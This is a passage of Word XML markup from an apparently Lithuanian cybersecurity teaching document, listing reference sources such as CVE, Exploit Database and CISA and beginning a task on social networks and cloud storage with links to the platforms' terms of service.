            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A22752A" w14:textId="4B6FDE02" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="285B3D62" w14:textId="77777777" w:rsidR="00C44711" w:rsidRPr="005A5C28" w:rsidRDefault="00C44711" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0165DEE3" w14:textId="5BA3720D" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2F01BB" w14:textId="5E01803A" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="6992C728" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Vulnerabilities and Exposures. </w:t>
      </w:r>
      <w:r w:rsidR="3E8B0AFD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE Records are used in numerous cybersecurity products and services.</w:t>
      </w:r>
      <w:r w:rsidR="3E8B0AFD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2F607EA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId95">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://cve.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FF10B6C" w14:textId="74468CF4" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="7238F737" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Exploit Database. </w:t>
      </w:r>
      <w:r w:rsidR="3605DC96" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Exploit Database is a non-profit project that is provided as a public service by Offensive Security.</w:t>
      </w:r>
      <w:r w:rsidR="3605DC96" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2F607EA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId96">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="208046DE" w14:textId="5485F3E3" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="286BE0B0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Touch J. </w:t>
      </w:r>
      <w:r w:rsidR="629F8469" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ir kiti </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(2021, sausio 15). </w:t>
      </w:r>
      <w:r w:rsidR="6BBCFF90" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Name and Transport Protocol Port Number Registry. </w:t>
      </w:r>
      <w:r w:rsidR="7B1E24EA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IANA. </w:t>
      </w:r>
      <w:r w:rsidR="2F607EA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId97">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F83B2FE" w14:textId="7148149B" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="49314DFB" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cybersecurity and Infrastructure Security Agency (CISA).</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2F607EA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId98">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://us-cert.cisa.gov</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7CCC043B" w14:textId="77777777" w:rsidR="00861B84" w:rsidRPr="005A5C28" w:rsidRDefault="4DEA77A4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pranešti apie incidentą. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nacionalinis kibernetinio saugumo centras prie Krašto apsaugos ministerijos.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId99">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.nksc.lt/pranesti.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76CB9498" w14:textId="77777777" w:rsidR="00163933" w:rsidRPr="005A5C28" w:rsidRDefault="00163933" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A857B5A" w14:textId="5112D2B2" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="42890CD5"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7</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SOCIALINIAI TINKLAI, DUOMENŲ SAUGOJIMAS DEBESYJE. KAM PRIKLAUSO JŪSŲ DUOMENYS?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FDF1EA" w14:textId="6CA34BD1"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Žemiau pateikiamas</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>populiari</w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ausių</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>socialinės žiniasklaidos ir internetinių saugojimo paslaugų sąrašas su nuorodomis į paslaugų teikimo sąlygų aprašus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AFB2BE" w14:textId="7B108CEB"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Socialiniai tinklai</w:t>
      </w:r>
      <w:r w:rsidR="4A203957" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255B1FF6" w14:textId="2884A5B2" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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Facebook</w:t>
      </w:r>
      <w:r w:rsidR="4A203957" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_Hlk61969013"/>
      <w:r w:rsidR="4A203957" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="4A203957" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidR="25CCBB3A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="25CCBB3A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.facebook.com/policies" </w:instrText>
      </w:r>
      <w:r w:rsidR="25CCBB3A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="4A203957" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://www.facebook.com/policies</w:t>
      </w:r>
      <w:r w:rsidR="25CCBB3A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE389F4" w14:textId="030D7B1A" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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Instagram</w:t>
      </w:r>
      <w:r w:rsidR="4A203957" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4A203957" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId100">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://instagram.com/legal/terms/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E8F054E" w14:textId="0299B807" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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Twitter</w:t>
      </w:r>
      <w:r w:rsidR="4A203957" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4A203957" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId101">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://twitter.com/tos</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EAAC2A9" w14:textId="4A29BD13" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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Pinterest</w:t>
      </w:r>
      <w:r w:rsidR="4A203957" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4A203957" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId102">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://about.pinterest.com/en/terms-service</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="079C56F1" w14:textId="003C00F4"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Duomenų saugojimo tarnybos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E807FD7" w14:textId="47143BAA" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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iCloud</w:t>
      </w:r>
      <w:r w:rsidR="5963396C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4A203957" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId103">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.apple.com/legal/internet-services/icloud/en/terms.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AB1ABA1" w14:textId="6C0CB6AA" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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Dropbox</w:t>
      </w:r>
      <w:r w:rsidR="5963396C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4A203957" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId104">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.dropbox.com/terms2014</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19E55C95" w14:textId="74FFBD12" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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OneDrive</w:t>
      </w:r>
      <w:r w:rsidR="5963396C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4A203957" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId105">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
